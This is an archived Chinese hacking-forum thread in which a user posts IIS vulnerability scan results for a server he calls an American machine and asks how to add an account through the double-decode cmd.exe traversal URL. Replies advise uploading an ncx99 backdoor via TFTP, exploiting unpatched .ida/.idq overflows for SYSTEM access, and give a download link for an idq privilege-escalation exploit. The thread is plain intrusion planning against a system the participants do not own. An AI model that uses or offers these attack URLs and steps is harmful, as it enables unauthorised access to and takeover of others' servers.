这是在 20CN网络安全小组第一代论坛 的论坛 电脑门诊 中的主题 扫瞄到一台机器,CGI漏洞如下,高手指点一二看小弟哪里不对


要查看这个主题,请使用这个 URL:
http://www.20cn.net/cgi-bin/ubb/ultimatebb.cgi?ubb=get_topic;f=6;t=000340

14279095 发表于 :
 
扫瞄到一台机器,CGI漏洞如下
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\ (HTTP: 200 )

/scripts/samples/search/simple.idq (HTTP: 200 )

/scripts/samples/search/queryhit.idq (HTTP: 200 )

/scripts/samples/search/query.idq (HTTP: 200 )

/scripts/samples/search/filetime.idq (HTTP: 200 )

/scripts/samples/search/filesize.idq (HTTP: 200 )

/scripts/samples/search/author.idq (HTTP: 200 )

/scripts/samples/search/qsumrhit.htw (HTTP: 200 )

/scripts/samples/search/qfullhit.htw (HTTP: 200 )

/iissamples/issamples/query.idq (HTTP: 200 )

/iissamples/issamples/oop/qsumrhit.htw (HTTP: 200 )

/iissamples/issamples/fastq.idq (HTTP: 200 )

/iissamples/issamples/oop/qfullhit.htw (HTTP: 200 )

/iissamples/exair/search/search.idq (HTTP: 200 )

/iissamples/exair/search/query.idq (HTTP: 200 )

/iissamples/exair/search/qsumrhit.htw (HTTP: 200 )

/iissamples/exair/search/qfullhit.htw (HTTP: 200 )

/iishelp/iis/misc/iirturnh.htw (HTTP: 200 )

/blabla.idq (HTTP: 200 )

/abczxv.htw (HTTP: 200 )

/?PageServices (HTTP: 200 )

/*.idq (HTTP: 200 )

/*.ida (HTTP: 200 )

我用添加命令如下
/ip//scripts/..%255c../winnt/system32/cmd.exe?/c+net+user+aa+aa+/add
结果显示如下
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
请问各位高手我错在哪里帮我解一下这题


 


DevilDragon 发表于 :
 
有二次解码,/?PageServices 这个可以利用,别的就没有用了。

------------------
爱,是多彩生活的调色板;爱,是一切生命的源泉;爱是多彩鲜花的芬芳;爱,是。。。。。。
 


14279095 发表于 :
 
有的话怎么利用,请告诉我,这是台老美的机器,不搞白不搞。:)
 
流星红 (编号: 2724) 发表于 :
 
第一个难道不可用!
 
流星红 (编号: 2724) 发表于 :
 
想这样添加帐号,不可能吧!
先上传一个后门,如ncx99(我喜欢用TFTP上传)
然后telnet99后就可以添加帐号了。
 
TomyChen (编号: 16) 发表于 :
 
如果*.ida没有打补丁的话也是有用的!
而且是最有用的。
两分种可以搞到system权
 
DevilDragon (编号: 5) 发表于 :
 
/scripts/samples/search/simple.idq 这个你到大鹰的主页上下个溢出的程序就行了,就能用,最后好像是root吧。
 
许哲 (编号: 3055) 发表于 :
 
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\ 你可以用这个东东穿个什么什么之类的木马上去~~嘿嘿~~而且有IDQ益出~http://home.luzhou.net/hujixing/idq.exe用这个可以提升你的用户权限~ 前提是已经传了什么什么什么之类的木马上去~OK?
 




Powered by Infopop Corporation
UBB.classic™ 6.5.0
NetDemon修改版 1.5.0, 20CN网络安全小组 版权所有。